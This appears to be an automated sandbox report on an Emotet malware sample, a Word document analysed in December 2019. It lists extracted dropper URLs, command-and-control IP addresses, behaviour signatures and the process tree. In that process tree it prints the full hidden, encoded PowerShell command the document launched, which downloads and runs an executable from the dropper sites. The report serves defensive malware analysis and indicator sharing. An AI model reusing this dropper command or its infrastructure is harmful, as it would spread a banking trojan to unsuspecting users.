Overview

overview

10

task1

 

10

task2

 

10

Analysis

  • max time kernel
    154s
  • resource
    win7v191014
  • submitted
    20-12-2019 03:54

Sharing

Copy URL
Twitter E-mail

General

  • Target

    Docs_8a1b1714e1ae0fabcf590df96af964ab.7

  • Sample

    191220-tn8jvh8qbn

  • SHA256

    e8f4adbc33575dfdc6cc8046ec0478baee34237bda285c3e9fd4798aea4ea516

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

https://fanitv.com/sandbox/oQmLZD/
exe.dropper

http://bicheru-cycling.ro/bbr/IEScmzh/
exe.dropper

http://lesdebatsdecouzon.org/lddc/7wpe2-kckbz4za-25568/
exe.dropper

https://4vetcbd.com/cgi-bin/CqCjQxYqx/
exe.dropper

http://zlatebenz.mk/wp-content/6nlkz6y-lmfk-9136296721/

Extracted

Family

emotet

C2

98.178.241.106:80

190.171.153.139:80

179.5.118.12:8080

45.79.75.232:8080

124.150.175.133:80

164.68.115.146:8080

5.189.148.98:8080

46.105.128.215:8080

67.254.196.78:443

95.216.207.86:7080

181.46.176.38:80

98.15.140.226:80

217.12.70.226:80

115.179.91.58:80

41.190.148.90:80

162.144.46.90:8080

211.218.105.101:80

212.129.14.27:8080

120.51.83.89:443

200.41.121.69:443
rsa_pubkey.plain

Signatures

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs
  • Executes dropped EXE 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 2 IoCs
  • Drops file in System32 directory 6 IoCs
  • Modifies registry class 144 IoCs
  • Process spawned unexpected child process 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails

    trojanbankeremotet
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\Docs_8a1b1714e1ae0fabcf590df96af964ab.7.doc"
    1⤵
    • Drops file in System32 directory
    • Suspicious use of FindShellTrayWindow
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:1688
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:00000000000005F8;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1408
  • C:\Windows\SYSTEM32\WISPTIS.EXE
    /QuitInfo:00000000000005F8;0000000000000650;
    1⤵
    • Suspicious use of SetWindowsHookEx
    PID:1828
  • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
    Powershell -w hidden -en JABHAHYAYQB1AG4AcQBiAHgAYgBwAHkAYQB5AD0AJwBUAGcAbQBqAHcAbQBwAGgAdAByAHYAJwA7ACQASABlAHQAZQB6AG4AZQBjAHcAbwBrAGMAIAA9ACAAJwA2ADYAMgAnADsAJABPAGYAbAB4AGIAdAByAG4AcgBmAGcAcwA9ACcARABmAHkAcABiAG8AZABpACcAOwAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0AD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABIAGUAdABlAHoAbgBlAGMAdwBvAGsAYwArACcALgBlAHgAZQAnADsAJABRAGoAcQBuAGgAZAByAHoAbgBmAG0AawA9ACcAWABpAHcAZgBvAGcAZABkACcAOwAkAEcAYwBmAGkAcQBqAGMAcABhAHcAPQAmACgAJwBuACcAKwAnAGUAdwAtAG8AJwArACcAYgBqAGUAYwAnACsAJwB0ACcAKQAgAG4ARQBUAC4AdwBlAGIAQwBsAEkARQBuAFQAOwAkAFcAbAByAG0AZgBmAG0AawB2AGMAPQAnAGgAdAB0AHAAcwA6AC8ALwBmAGEAbgBpAHQAdgAuAGMAbwBtAC8AcwBhAG4AZABiAG8AeAAvAG8AUQBtAEwAWgBEAC8AKgBoAHQAdABwADoALwAvAGIAaQBjAGgAZQByAHUALQBjAHkAYwBsAGkAbgBnAC4AcgBvAC8AYgBiAHIALwBJAEUAUwBjAG0AegBoAC8AKgBoAHQAdABwADoALwAvAGwAZQBzAGQAZQBiAGEAdABzAGQAZQBjAG8AdQB6AG8AbgAuAG8AcgBnAC8AbABkAGQAYwAvADcAdwBwAGUAMgAtAGsAYwBrAGIAegA0AHoAYQAtADIANQA1ADYAOAAvACoAaAB0AHQAcABzADoALwAvADQAdgBlAHQAYwBiAGQALgBjAG8AbQAvAGMAZwBpAC0AYgBpAG4ALwBDAHEAQwBqAFEAeABZAHEAeAAvACoAaAB0AHQAcAA6AC8ALwB6AGwAYQB0AGUAYgBlAG4AegAuAG0AawAvAHcAcAAtAGMAbwBuAHQAZQBuAHQALwA2AG4AbABrAHoANgB5AC0AbABtAGYAawAtADkAMQAzADYAMgA5ADYANwAyADEALwAnAC4AIgBTAHAAYABsAGkAVAAiACgAJwAqACcAKQA7ACQARQBuAHMAZwBwAHoAbwBnAGgAdABoAD0AJwBEAGcAbwBvAGgAZgBlAHAAJwA7AGYAbwByAGUAYQBjAGgAKAAkAFQAZgBnAHEAdAB1AGIAeABxACAAaQBuACAAJABXAGwAcgBtAGYAZgBtAGsAdgBjACkAewB0AHIAeQB7ACQARwBjAGYAaQBxAGoAYwBwAGEAdwAuACIAZABPAHcAbgBsAG8AYQBgAGQAZgBgAGkAbABFACIAKAAkAFQAZgBnAHEAdAB1AGIAeABxACwAIAAkAFEAbwBkAHEAbwBrAHcAYQBtAG8AbQB0ACkAOwAkAFcAcgB0AHMAeAB0AHEAcABtAGcAZABqAD0AJwBMAGoAbwByAGcAYwB0AHYAZgBmACcAOwBJAGYAIAAoACgALgAoACcARwAnACsAJwBlACcAKwAnAHQALQBJAHQAZQBtACcAKQAgACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQAuACIATABFAE4AYABHAFQASAAiACAALQBnAGUAIAAzADQAMwA1ADkAKQAgAHsAWwBEAGkAYQBnAG4AbwBzAHQAaQBjAHMALgBQAHIAbwBjAGUAcwBzAF0AOgA6ACIAUwBUAGAAQQBSAFQAIgAoACQAUQBvAGQAcQBvAGsAdwBhAG0AbwBtAHQAKQA7ACQAUwB2AHgAeQB4AGsAdQB3AD0AJwBHAHEAbgBxAGUAdQBsAHoAdQBsAGQAYwB4ACcAOwBiAHIAZQBhAGsAOwAkAEoAcQB6AGIAbQBvAHoAeQB0AHkAdAA9ACcARwB5AHoAbwB3AG4AaABhAHQAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAQQB0AGYAeABuAHcAcQB4AGcAbABvAD0AJwBWAGIAaABoAHMAdABzAGsAZgBkAHQAdwAnAA==
    1⤵
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    • Process spawned unexpected child process
    • Suspicious use of AdjustPrivilegeToken
    PID:112
    • C:\Users\Admin\662.exe
      "C:\Users\Admin\662.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      • Executes dropped EXE
      • Suspicious use of SetWindowsHookEx
      PID:2092
      • C:\Users\Admin\662.exe
        --2a4aec10
        3⤵
        • Executes dropped EXE
        • Suspicious behavior: EmotetMutantsSpam
        • Drops file in System32 directory
        • Suspicious use of SetWindowsHookEx
        PID:2112
  • C:\Windows\SysWOW64\rawangle.exe
    "C:\Windows\SysWOW64\rawangle.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    • Executes dropped EXE
    • Suspicious use of SetWindowsHookEx
    PID:2176
    • C:\Windows\SysWOW64\rawangle.exe
      --ec102a9d
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      • Drops file in System32 directory
      • Suspicious use of SetWindowsHookEx
      PID:2196

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1688-3-0x000000000669A000-0x000000000669D000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1688-8-0x000000000669F000-0x00000000066A2000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1688-0-0x00000000064E0000-0x00000000064E4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1688-7-0x000000000669D000-0x000000000669F000-memory.dmp

    Filesize

    8KB

    Download

  • memory/1688-4-0x0000000009820000-0x0000000009824000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1688-2-0x000000000669A000-0x000000000669D000-memory.dmp

    Filesize

    12KB

    Download

  • memory/1688-1-0x000000000039F000-0x00000000003AF000-memory.dmp

    Filesize

    64KB

    Download

  • memory/2092-12-0x0000000000500000-0x0000000000517000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2112-17-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download

  • memory/2112-16-0x00000000003A0000-0x00000000003B7000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2176-19-0x0000000000930000-0x0000000000947000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2196-21-0x0000000000540000-0x0000000000557000-memory.dmp

    Filesize

    92KB

    Download

  • memory/2196-22-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

    Download